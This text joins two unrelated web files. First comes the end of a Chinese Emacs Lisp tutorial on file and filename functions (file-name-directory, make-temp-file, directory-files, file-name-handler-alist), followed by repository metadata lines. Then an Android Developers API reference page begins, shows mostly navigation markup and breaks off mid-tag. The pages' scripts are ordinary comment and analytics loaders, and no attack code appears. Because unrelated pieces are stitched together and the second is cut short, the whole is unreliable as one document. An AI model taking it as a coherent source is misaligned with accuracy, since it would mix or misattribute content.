前一组函数是直接由文件名访问文件信息,而后一组函数是由 file-attributes 的返回值来得到文件信息 </pre> </div> </div> <div id="outline-container-orgf9e4cd2" class="outline-2"> <h2 id="orgf9e4cd2">修改文件信息</h2> <div class="outline-text-2" id="text-orgf9e4cd2"> <ul class="org-ul"> <li>重命名和复制文件可以用 <span class="underline">rename-file</span> 和 <span class="underline">copy-file</span></li> <li>删除文件使用 <span class="underline">delete-file</span></li> <li>创建目录使用 <span class="underline">make-directory</span> 函数</li> <li>不能用 delete-file 删除 目录,只能用 <span class="underline">delete-directory</span> 删除目录,当目录不为空时会产生一个错误</li> <li>设置文件修改时间使用 <span class="underline">set-file-times</span></li> <li>设置文件位模式可以用 <span class="underline">set-file-modes</span> 函数:参数必须是一个整数 <ul class="org-ul"> <li>可以用位函数 logand、logior 和 logxor 函数来进行位操作</li> </ul></li> </ul> </div> </div> <div id="outline-container-orgfb973bd" class="outline-2"> <h2 id="orgfb973bd">文件名操作</h2> <div class="outline-text-2" id="text-orgfb973bd"> <p> 路径一般由 <span class="underline">目录</span> 和 <span class="underline">文件名</span> ,而文件名一般由 <span class="underline">主文件名</span> (basename)、 <span class="underline">文件名后缀</span> 和 <span class="underline">版本号</span> 构成。 Emacs 有一系列函数来得到路径中的不同部分: </p> <div class="org-src-container"> <pre class="src src-lisp">(file-name-directory <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~/tmp/"</span> (file-name-nondirectory <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "test.txt"</span> (file-name-sans-extension <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~/tmp/test"</span> (file-name-extension <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "txt"</span> (file-name-sans-versions <span style="color: #deb887;">"~/tmp/test.txt~"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~/tmp/test.txt"</span> (file-name-sans-versions <span style="color: #deb887;">"~/tmp/test.txt.~1~"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~/tmp/test.txt"</span> </pre> </div> <pre class="example"> 虽然 MSWin 的文件名使用的路径分隔符不同,但是这里介绍的函数都能用于 MSWin 形式的文件名,只是返回的文件名都是 Unix 形式了 </pre> <p> 路径如果是从根目录开始的称为是绝对路径: </p> <ul class="org-ul"> <li>测试一个路径是否是绝对路径使用 <span class="underline">file-name-absolute-p</span> <ul class="org-ul"> <li>如果在 Unix 或 GNU/Linux 系统,以 ~ 开头的路径也是绝对路径</li> <li>在 MSWin 上,以 "/" 、 "\"、"X:" 开头的路径都是绝对路径</li> </ul></li> <li>如果不是绝对路径,可以使用 <span class="underline">expand-file-name</span> 来得到绝对路径</li> <li>把一个绝对路径转换成相对某个路径的相对路径的可以用 <span class="underline">file-relative-name</span> 函数</li> </ul> <div class="org-src-container"> <pre class="src src-lisp">(file-name-absolute-p <span style="color: #deb887;">"~rms/foo"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (file-name-absolute-p <span style="color: #deb887;">"/user/rms/foo"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (expand-file-name <span style="color: #deb887;">"foo"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "/home/klose/foo"</span> (expand-file-name <span style="color: #deb887;">"foo"</span> <span style="color: #deb887;">"/usr/spool/"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "/usr/spool/foo"</span> (file-relative-name <span style="color: #deb887;">"/foo/bar"</span> <span style="color: #deb887;">"/foo/"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "bar"</span> (file-relative-name <span style="color: #deb887;">"/foo/bar"</span> <span style="color: #deb887;">"/hack/"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "../foo/bar"</span> </pre> </div> <p> 对于目录,如果要将其作为目录,也就是确保它是以路径分隔符结束,可以用 <span class="underline">file-name-as-directory</span> </p> <pre class="example"> 不要用 (concat dir "/") 来转换,这会有移植问题 </pre> <p> 和它相对应的函数是 <span class="underline">directory-file-name</span> </p> <div class="org-src-container"> <pre class="src src-lisp">(file-name-as-directory <span style="color: #deb887;">"~rms/lewis"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~rms/lewis/"</span> (directory-file-name <span style="color: #deb887;">"~lewis/"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "~lewis"</span> </pre> </div> <p> 如果要得到所在系统使用的文件名,可以用 <span class="underline">convert-standard-filename</span> </p> <div class="org-src-container"> <pre class="src src-lisp">(convert-standard-filename <span style="color: #deb887;">"c:/windows"</span>) <span style="color: #5f9ea0; font-style: italic;">;=&gt; "c:\\windows"</span> </pre> </div> <pre class="example"> 比如 在 MSWin 系统上,可以用这个函数返回用 "\" 分隔的文件名 </pre> </div> </div> <div id="outline-container-org649f07e" class="outline-2"> <h2 id="org649f07e">临时文件</h2> <div class="outline-text-2" id="text-org649f07e"> <ul class="org-ul"> <li>如果需要产生一个临时文件,可以使用 <span class="underline">make-temp-file</span> <ul class="org-ul"> <li>这个函数按给定前缀产生一个不和现有文件冲突的文件,并返回它的文件名</li> <li>如果给定的名字是一个相对文件名,则产生的文件名会用 <span class="underline">temporary-file-directory</span> 进行扩展 <ul class="org-ul"> <li>也可以用这个函数产生一个临时文件夹</li> </ul></li> </ul></li> <li>如果只想产生一个不存在的文件名,可以用 <span class="underline">make-temp-name</span> 函数</li> </ul> <div class="org-src-container"> <pre class="src src-lisp">(make-temp-file <span style="color: #deb887;">"foo"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "/tmp/foo5611dxf"</span> (make-temp-name <span style="color: #deb887;">"foo"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "foo5611q7l"</span> </pre> </div> </div> </div> <div id="outline-container-org14afedb" class="outline-2"> <h2 id="org14afedb">读取目录内容</h2> <div class="outline-text-2" id="text-org14afedb"> <p> 可以用 <span class="underline">directory-files</span> 来得到某个目录中的全部或者符合某个正则表达式的文件名: </p> <div class="org-src-container"> <pre class="src src-lisp">(directory-files <span style="color: #deb887;">"~/tmp/dir/"</span>) <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">=&gt;</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">("#foo.el#" "." ".#foo.el" ".." "foo.el" "t.pl" "t2.pl")</span> (directory-files <span style="color: #deb887;">"~/tmp/dir/"</span> t) <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">=&gt;</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">("/home/ywb/tmp/dir/#foo.el#"</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/."</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/.#foo.el"</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/.."</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/foo.el"</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/t.pl"</span> <span style="color: #5f9ea0; font-style: italic;">;; </span><span style="color: #5f9ea0; font-style: italic;">"/home/ywb/tmp/dir/t2.pl")</span> (directory-files <span style="color: #deb887;">"~/tmp/dir/"</span> nil <span style="color: #deb887;">"\\.pl$"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; ("t.pl" "t2.pl")</span> </pre> </div> <ul class="org-ul"> <li><span class="underline">directory-files-and-attributes</span> 和 directory-files 相似,但是返回的列表 中包含了 file-attributes 得到的信息</li> <li><span class="underline">file-name-all-versions</span> 用于得到某个文件在目录中的所有版本</li> <li><span class="underline">file-expand-wildcards</span> 可以用通配符来得到目录中的文件列表</li> </ul> </div> </div> <div id="outline-container-orgfbd11db" class="outline-2"> <h2 id="orgfbd11db">文件Handle</h2> <div class="outline-text-2" id="text-orgfbd11db"> <pre class="example"> 如果不把文件局限在存储在本地机器上的信息,而且有一套基本的文件操作,比如判断文件是否存在、打开文件、保存文件、得到目录内容之类,那远程的文件和本地文件的差别也仅在于文件名表示方法不同而已 在 Emacs 里,底层的文件操作函数都可以托管给 elisp 中的函数,这样只要用 elisp 实现了某种类型文件的基本操作,就能像编辑本地文件一样编辑其它类型文件了 </pre> <p> 决定何种类型的文件名使用什么方式来操作是在 <span class="underline">file-name-handler-alist</span> 变量定义的。它是由形如 <span class="underline">(REGEXP . HANDLER)</span> 的列表。如果文件名匹配这个 REGEXP 则使用 HANDLER 来进行相应的文件操作。这里所说的文件操作,具体的来说有这些函数: </p> <div class="org-src-container"> <pre class="src src-lisp">`<span style="color: #ffd700;">access-file</span>', `<span style="color: #ffd700;">add-name-to-file</span>', `<span style="color: #ffd700;">byte-compiler-base-file-name</span>', `<span style="color: #ffd700;">copy-file</span>', `<span style="color: #ffd700;">delete-directory</span>', `<span style="color: #ffd700;">delete-file</span>', `<span style="color: #ffd700;">diff-latest-backup-file</span>', `<span style="color: #ffd700;">directory-file-name</span>', `<span style="color: #ffd700;">directory-files</span>', `<span style="color: #ffd700;">directory-files-and-attributes</span>', `<span style="color: #ffd700;">dired-call-process</span>', `<span style="color: #ffd700;">dired-compress-file</span>', `<span style="color: #ffd700;">dired-uncache</span>', `<span style="color: #ffd700;">expand-file-name</span>', `<span style="color: #ffd700;">file-accessible-directory-p</span>', `<span style="color: #ffd700;">file-attributes</span>', `<span style="color: #ffd700;">file-directory-p</span>', `<span style="color: #ffd700;">file-executable-p</span>', `<span style="color: #ffd700;">file-exists-p</span>', `<span style="color: #ffd700;">file-local-copy</span>', `<span style="color: #ffd700;">file-remote-p</span>', `<span style="color: #ffd700;">file-modes</span>', `<span style="color: #ffd700;">file-name-all-completions</span>', `<span style="color: #ffd700;">file-name-as-directory</span>', `<span style="color: #ffd700;">file-name-completion</span>', `<span style="color: #ffd700;">file-name-directory</span>', `<span style="color: #ffd700;">file-name-nondirectory</span>', `<span style="color: #ffd700;">file-name-sans-versions</span>', `<span style="color: #ffd700;">file-newer-than-file-p</span>', `<span style="color: #ffd700;">file-ownership-preserved-p</span>', `<span style="color: #ffd700;">file-readable-p</span>', `<span style="color: #ffd700;">file-regular-p</span>', `<span style="color: #ffd700;">file-symlink-p</span>', `<span style="color: #ffd700;">file-truename</span>', `<span style="color: #ffd700;">file-writable-p</span>', `<span style="color: #ffd700;">find-backup-file-name</span>', `<span style="color: #ffd700;">find-file-noselect</span>', `<span style="color: #ffd700;">get-file-buffer</span>', `<span style="color: #ffd700;">insert-directory</span>', `<span style="color: #ffd700;">insert-file-contents</span>', `<span style="color: #ffd700;">load</span>', `<span style="color: #ffd700;">make-auto-save-file-name</span>', `<span style="color: #ffd700;">make-directory</span>', `<span style="color: #ffd700;">make-directory-internal</span>', `<span style="color: #ffd700;">make-symbolic-link</span>', `<span style="color: #ffd700;">rename-file</span>', `<span style="color: #ffd700;">set-file-modes</span>', `<span style="color: #ffd700;">set-file-times</span>', `<span style="color: #ffd700;">set-visited-file-modtime</span>', `<span style="color: #ffd700;">shell-command</span>', `<span style="color: #ffd700;">substitute-in-file-name</span>', `<span style="color: #ffd700;">unhandled-file-name-directory</span>', `<span style="color: #ffd700;">vc-registered</span>', `<span style="color: #ffd700;">verify-visited-file-modtime</span>', `<span style="color: #ffd700;">write-region</span>' </pre> </div> <p> 在 HANDLE 里,可以只接管部分的文件操作,其它仍交给 emacs 原来的函数来完成 </p> <pre class="example"> 举一个简单的例子。比如最新版本的 emacs 把 *scratch* 的 auto-save-mode 打开了 如果你不想这个缓冲区的自动保存的文件名散布得到处都是,可以想办法让这个缓冲区的自动保存文件放到指定的目录中 刚好 make-auto-save-file-name 是在上面这个列表里的,但是不幸的是在函数定义里 make-auto-save-file-name 里不对不关联文件的缓冲区使用 handler 继续往下看,发现生成保存文件名是使用了 expand-file-name 函数 </pre> <p> 一个解决方法就是: </p> <div class="org-src-container"> <pre class="src src-lisp">(<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">my-scratch-auto-save-file-name</span> (operation <span style="color: #98f5ff;">&amp;rest</span> args) (<span style="color: #00bfff; font-weight: bold;">if</span> (and (eq operation 'expand-file-name) (string= (car args) <span style="color: #deb887;">"#*scratch*#"</span>)) (expand-file-name (concat <span style="color: #deb887;">"~/.emacs.d/backup/"</span> (car args))) (<span style="color: #00bfff; font-weight: bold;">let</span> ((inhibit-file-name-handlers (cons 'my-scratch-auto-save-file-name (and (eq inhibit-file-name-operation operation) inhibit-file-name-handlers))) (inhibit-file-name-operation operation)) (apply operation args)))) </pre> </div> <p> <a href="text.html">Next:文本</a> </p> <p> <a href="window.html">Previous:窗口</a> </p> <p> <a href="operation-objects.html">TOP:操作对象</a> </p> </div> </div> </div> <div id="postamble" class="status"> <br/> <div class='ds-thread'></div> <script> var duoshuoQuery = {short_name:'klose911'}; (function() { var dsThread = document.getElementsByClassName('ds-thread')[0]; dsThread.setAttribute('data-thread-key', document.title); dsThread.setAttribute('data-title', document.title); dsThread.setAttribute('data-url', window.location.href); var ds = document.createElement('script'); ds.type = 'text/javascript';ds.async = true; ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js'; ds.charset = 'UTF-8'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ds); })(); </script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-90850421-1', 'auto'); ga('send', 'pageview'); </script> </div> </body> </html>
klose911/klose911.github.io
html/elisp/operation-objects/file.html
HTML
apache-2.0
42,496
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width" /> <link rel="shortcut icon" type="image/x-icon" href="../../../../../../../favicon.ico" /> <title>com.google.android.gms.games.multiplayer | Android Developers</title> <!-- STYLESHEETS --> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto+Condensed"> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto:light,regular,medium,thin,italic,mediumitalic,bold" title="roboto"> <link href="../../../../../../../assets/css/default.css?v=2" rel="stylesheet" type="text/css"> <!-- FULLSCREEN STYLESHEET --> <link href="../../../../../../../assets/css/fullscreen.css" rel="stylesheet" class="fullscreen" type="text/css"> <!-- JAVASCRIPT --> <script src="http://www.google.com/jsapi" type="text/javascript"></script> <script src="../../../../../../../assets/js/android_3p-bundle.js" type="text/javascript"></script> <script type="text/javascript"> var toRoot = "../../../../../../../"; var metaTags = []; var devsite = false; </script> <script src="../../../../../../../assets/js/docs.js?v=2" type="text/javascript"></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-5831155-1', 'android.com'); ga('create', 'UA-49880327-2', 'android.com', {'name': 'universal'}); // New tracker); ga('send', 'pageview'); ga('universal.send', 'pageview'); // Send page view for new tracker. </script> </head> <body class="gc-documentation develop"> <div id="doc-api-level" class="" style="display:none"></div> <a name="top"></a> <a name="top"></a> <!-- Header --> <div id="header-wrapper"> <div id="header"> <div class="wrap" id="header-wrap"> <div class="col-3 logo"> <a href="../../../../../../../index.html"> <img src="../../../../../../../assets/images/dac_logo.png" srcset="../../../../../../../assets/images/dac_logo@2x.png 2x" width="123" height="25" alt="Android Developers" /> </a> <div class="btn-quicknav" id="btn-quicknav"> <a href="#" class="arrow-inactive">Quicknav</a> <a href="#" class="arrow-active">Quicknav</a> </div> </div> <ul class="nav-x col-9"> <li class="design"> <a href="../../../../../../../design/index.html" zh-tw-lang="設計" zh-cn-lang="设计" ru-lang="Проектирование" ko-lang="디자인" ja-lang="設計" es-lang="Diseñar" >Design</a></li> <li class="develop"><a href="../../../../../../../develop/index.html" zh-tw-lang="開發" zh-cn-lang="开发" ru-lang="Разработка" ko-lang="개발" ja-lang="開発" es-lang="Desarrollar" >Develop</a></li> <li class="distribute last"><a href="../../../../../../../distribute/googleplay/index.html" zh-tw-lang="發佈" zh-cn-lang="分发" ru-lang="Распространение" ko-lang="배포" ja-lang="配布" es-lang="Distribuir" >Distribute</a></li> </ul> <div class="menu-container"> <div class="moremenu"> <div id="more-btn"></div> </div> <div class="morehover" id="moremenu"> <div class="top"></div> <div class="mid"> <div class="header">Links</div> <ul> <li><a href="https://play.google.com/apps/publish/" target="_googleplay">Google Play Developer Console</a></li> <li><a href="http://android-developers.blogspot.com/">Android Developers Blog</a></li> <li><a href="../../../../../../../about/index.html">About Android</a></li> </ul> <div class="header">Android Sites</div> <ul> <li><a href="http://www.android.com">Android.com</a></li> <li class="active"><a>Android Developers</a></li> <li><a href="http://source.android.com">Android Open Source Project</a></li> </ul> <br class="clearfix" /> </div><!-- end 'mid' --> <div class="bottom"></div> </div><!-- end 'moremenu' --> <div class="search" id="search-container"> <div class="search-inner"> <div id="search-btn"></div> <div class="left"></div> <form onsubmit="return submit_search()"> <input id="search_autocomplete" type="text" value="" autocomplete="off" name="q" onfocus="search_focus_changed(this, true)" onblur="search_focus_changed(this, false)" onkeydown="return search_changed(event, true, '../../../../../../../')" onkeyup="return search_changed(event, false, '../../../../../../../')" /> </form> <div class="right"></div> <a class="close hide">close</a> <div class="left"></div> <div class="right"></div> </div><!-- end search-inner --> </div><!-- end search-container --> <div class="search_filtered_wrapper reference"> <div class="suggest-card reference no-display"> <ul class="search_filtered"> </ul> </div> </div> <div class="search_filtered_wrapper docs"> <div class="suggest-card dummy no-display">&nbsp;</div> <div class="suggest-card develop no-display"> <ul class="search_filtered"> </ul> <div class="child-card guides no-display"> </div> <div class="child-card training no-display"> </div> <div class="child-card samples no-display"> </div> </div> <div class="suggest-card design no-display"> <ul class="search_filtered"> </ul> </div> <div class="suggest-card distribute no-display"> <ul class="search_filtered"> </ul> </div> </div> </div><!-- end menu-container (search and menu widget) --> <!-- Expanded quicknav --> <div id="quicknav" class="col-13"> <ul> <li class="about"> <ul> <li><a href="../../../../../../../about/index.html">About</a></li> <li><a href="../../../../../../../wear/index.html">Wear</a></li> <li><a href="../../../../../../../tv/index.html">TV</a></li> <li><a href="../../../../../../../auto/index.html">Auto</a></li> </ul> </li> <li class="design"> <ul> <li><a href="../../../../../../../design/index.html">Get Started</a></li> <li><a href="../../../../../../../design/devices.html">Devices</a></li> <li><a href="../../../../../../../design/style/index.html">Style</a></li> <li><a href="../../../../../../../design/patterns/index.html">Patterns</a></li> <li><a href="../../../../../../../design/building-blocks/index.html">Building Blocks</a></li> <li><a href="../../../../../../../design/downloads/index.html">Downloads</a></li> <li><a href="../../../../../../../design/videos/index.html">Videos</a></li> </ul> </li> <li class="develop"> <ul> <li><a href="../../../../../../../training/index.html" zh-tw-lang="訓練課程" zh-cn-lang="培训" ru-lang="Курсы" ko-lang="교육" ja-lang="トレーニング" es-lang="Capacitación" >Training</a></li> <li><a href="../../../../../../../guide/index.html" zh-tw-lang="API 指南" zh-cn-lang="API 指南" ru-lang="Руководства по API" ko-lang="API 가이드" ja-lang="API ガイド" es-lang="Guías de la API" >API Guides</a></li> <li><a href="../../../../../../../reference/packages.html" zh-tw-lang="參考資源" zh-cn-lang="参考" ru-lang="Справочник" ko-lang="참조문서" ja-lang="リファレンス" es-lang="Referencia" >Reference</a></li> <li><a href="../../../../../../../sdk/index.html" zh-tw-lang="相關工具" zh-cn-lang="工具" ru-lang="Инструменты" ko-lang="도구" ja-lang="ツール" es-lang="Herramientas" >Tools</a> </li> <li><a href="../../../../../../../google/index.html">Google Services</a> </li> </ul> </li> <li class="distribute last"> <ul> <li><a href="../../../../../../../distribute/googleplay/index.html">Google Play</a></li> <li><a href="../../../../../../../distribute/essentials/index.html">Essentials</a></li> <li><a href="../../../../../../../distribute/users/index.html">Get Users</a></li> <li><a href="../../../../../../../distribute/engage/index.html">Engage &amp; Retain</a></li> <li><a href="../../../../../../../distribute/monetize/index.html">Monetize</a></li> <li><a href="../../../../../../../distribute/tools/index.html">Tools &amp; Reference</a></li> <li><a href="../../../../../../../distribute/stories/index.html">Developer Stories</a></li> </ul> </li> </ul> </div><!-- /Expanded quicknav --> </div><!-- end header-wrap.wrap --> </div><!-- end header --> <!-- Secondary x-nav --> <div id="nav-x"> <div class="wrap"> <ul class="nav-x col-9 develop" style="width:100%"> <li class="training"><a href="../../../../../../../training/index.html" zh-tw-lang="訓練課程" zh-cn-lang="培训" ru-lang="Курсы" ko-lang="교육" ja-lang="トレーニング" es-lang="Capacitación" >Training</a></li> <li class="guide"><a href="../../../../../../../guide/index.html" zh-tw-lang="API 指南" zh-cn-lang="API 指南" ru-lang="Руководства по API" ko-lang="API 가이드" ja-lang="API ガイド" es-lang="Guías de la API" >API Guides</a></li> <li class="reference"><a href="../../../../../../../reference/packages.html" zh-tw-lang="參考資源" zh-cn-lang="参考" ru-lang="Справочник" ko-lang="참조문서" ja-lang="リファレンス" es-lang="Referencia" >Reference</a></li> <li class="tools"><a href="../../../../../../../sdk/index.html" zh-tw-lang="相關工具" zh-cn-lang="工具" ru-lang="Инструменты" ko-lang="도구" ja-lang="ツール" es-lang="Herramientas" >Tools</a></li> <li class="google"><a href="../../../../../../../google/index.html" >Google Services</a> </li> </ul> </div> </div> <!-- /Sendondary x-nav DEVELOP --> <div id="searchResults" class="wrap" style="display:none;"> <h2 id="searchTitle">Results</h2> <div id="leftSearchControl" class="search-control">Loading...</div> </div> </div> <!--end header-wrapper --> <div id="sticky-header"> <div> <a class="logo" href="#top"></a> <a class="top" href="#top"></a> <ul class="breadcrumb"> <li class="current">com.google.android.gms.games.multiplayer</li> </ul> </div> </div> <div class="wrap clearfix" id="body-content"> <div class="col-4" id="side-nav" itemscope itemtype="http://schema.org/SiteNavigationElement"> <div id="devdoc-nav"> <div id="api-nav-header"> <div id="api-level-toggle"> <label for="apiLevelCheckbox" class="disabled" title="Select your target API level to dim unavailable APIs">API level: </label> <div class="select-wrapper"> <select id="apiLevelSelector"> <!-- option elements added by buildApiLevelSelector() --> </select> </div> </div><!-- end toggle --> <div id="api-nav-title">Android APIs</div> </div><!-- end nav header --> <script> var SINCE_DATA = [ ]; buildApiLevelSelector(); </script> <div id="swapper"> <div id="nav-panels"> <div id="resize-packages-nav"> <div id="packages-nav" class="scroll-pane"> <ul> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/package-summary.html">com.google.android.gms</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/actions/package-summary.html">com.google.android.gms.actions</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/package-summary.html">com.google.android.gms.ads</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/doubleclick/package-summary.html">com.google.android.gms.ads.doubleclick</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/identifier/package-summary.html">com.google.android.gms.ads.identifier</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/mediation/package-summary.html">com.google.android.gms.ads.mediation</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/mediation/admob/package-summary.html">com.google.android.gms.ads.mediation.admob</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/mediation/customevent/package-summary.html">com.google.android.gms.ads.mediation.customevent</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/purchase/package-summary.html">com.google.android.gms.ads.purchase</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/ads/search/package-summary.html">com.google.android.gms.ads.search</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/analytics/package-summary.html">com.google.android.gms.analytics</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/analytics/ecommerce/package-summary.html">com.google.android.gms.analytics.ecommerce</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/appindexing/package-summary.html">com.google.android.gms.appindexing</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/appstate/package-summary.html">com.google.android.gms.appstate</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/auth/package-summary.html">com.google.android.gms.auth</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/auth/api/package-summary.html">com.google.android.gms.auth.api</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/cast/package-summary.html">com.google.android.gms.cast</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/common/package-summary.html">com.google.android.gms.common</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/common/annotation/package-summary.html">com.google.android.gms.common.annotation</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/common/api/package-summary.html">com.google.android.gms.common.api</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/common/data/package-summary.html">com.google.android.gms.common.data</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/common/images/package-summary.html">com.google.android.gms.common.images</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/drive/package-summary.html">com.google.android.gms.drive</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/drive/events/package-summary.html">com.google.android.gms.drive.events</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/drive/metadata/package-summary.html">com.google.android.gms.drive.metadata</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/drive/query/package-summary.html">com.google.android.gms.drive.query</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/drive/widget/package-summary.html">com.google.android.gms.drive.widget</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/fitness/package-summary.html">com.google.android.gms.fitness</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/fitness/data/package-summary.html">com.google.android.gms.fitness.data</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/fitness/request/package-summary.html">com.google.android.gms.fitness.request</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/fitness/result/package-summary.html">com.google.android.gms.fitness.result</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/fitness/service/package-summary.html">com.google.android.gms.fitness.service</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/package-summary.html">com.google.android.gms.games</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/achievement/package-summary.html">com.google.android.gms.games.achievement</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/event/package-summary.html">com.google.android.gms.games.event</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/leaderboard/package-summary.html">com.google.android.gms.games.leaderboard</a></li> <li class="selected api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/package-summary.html">com.google.android.gms.games.multiplayer</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/realtime/package-summary.html">com.google.android.gms.games.multiplayer.realtime</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/package-summary.html">com.google.android.gms.games.multiplayer.turnbased</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/quest/package-summary.html">com.google.android.gms.games.quest</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/request/package-summary.html">com.google.android.gms.games.request</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/games/snapshot/package-summary.html">com.google.android.gms.games.snapshot</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/gcm/package-summary.html">com.google.android.gms.gcm</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/identity/intents/package-summary.html">com.google.android.gms.identity.intents</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/identity/intents/model/package-summary.html">com.google.android.gms.identity.intents.model</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/location/package-summary.html">com.google.android.gms.location</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/maps/package-summary.html">com.google.android.gms.maps</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/maps/model/package-summary.html">com.google.android.gms.maps.model</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/panorama/package-summary.html">com.google.android.gms.panorama</a></li> <li class="api 